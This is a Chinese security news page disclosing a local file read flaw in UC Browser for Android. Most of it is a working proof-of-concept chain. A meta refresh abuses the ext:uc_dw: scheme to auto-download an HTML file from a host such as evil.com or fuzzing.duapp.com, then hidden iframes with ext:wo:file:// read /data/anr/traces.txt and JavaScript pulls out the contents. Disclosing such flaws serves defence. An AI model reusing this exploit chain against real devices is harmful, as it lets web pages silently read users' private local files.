资讯 安全 论坛 下载 读书 程序开发 数据库 系统 网络 电子书 微信学院 站长学院 QQ 考试
频道栏目
系统安全| 安全资讯| 安全公告| 病毒预警| 人物| 企业招聘| 其他综合|
登录注册
首页 > 资讯 > 系统安全 > 正文

UC浏览器本地文件读取

13-10-28        来源:[db:作者]  
收藏   我要投稿
UC浏览器最新版可通过下面的链接自动下载文件。
 
ext:uc_dw:http://www.evil.com/evil.html
 
 
UC浏览器默认的下载路径为/sdcard/UCDownloads
 
所以自动下载保存文件名为/sdcard/UCDownloads/evil.html
 
UC浏览器虽然禁止在http://的页面中直接调用file://,但还是可以从http://跨到file://。POC如下:
 
<iframe src=ext:wo:file:///evil.html></iframe>
 
 
接下来就可以读取本地文件了,最后的POC如下:
<meta http-equiv="refresh" content="0;URL=ext:uc_dw:http://fuzzing.duapp.com/evil.html"/>

<script> 

function init(){ 

  window.location = "getdata.html"; 

}

 

setTimeout(init,5000)  //5秒后跳转
 
</script>
 
 
evil.html的代码如下:
 
<iframe id=test style=display:none src=ext:wo:file://///data/anr/traces.txt onload=getdata()></iframe>

<script> 

function getdata(){

var data=document.getElementById("test").contentWindow.document.body.innerHTML; 

alert(data);

} 

</script>

 

 
 
getdata.html的代码如下:
 
<iframe style=display:none src=ext:wo:file://///sdcard/UCDownloads/evil.html></iframe>

 
非极速模式下访问下面的链接即可获取/data/anr/traces.txt的内容
 
http://fuzzing.duapp.com/uc.html
 
 
 
PS: UC浏览器下载路径须为/sdcard/UCDownloads
点击复制链接 与好友分享!回本站首页
相关TAG标签
上一篇:Oracle 11g New使用RMAN增强功能
下一篇:Java研究_Java面试题
相关文章
热门专题推荐 vmware win7激活工具 win10激活工具 excel word office激活 小马激活工具 重装系统 数据恢复 u盘启动工具
图文推荐
文章
推荐
热门新闻
· 锤子坚果Pro发布后,罗永浩哭了
· 想实习的大学党看过来!这些科技巨头最
· 罗永浩锤子发布会抢先消息:锤子科技新
· Google新一代系统Fuchsia OS界面曝光
· 中国唯一连续运营20余年的网络游戏,还
· iPhone都便宜了 为何国产手机越来越贵
· 丢人!谷歌和Facebook竟被虚假企业电邮
· 中国移动支付震惊日本网友 为什么美国

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站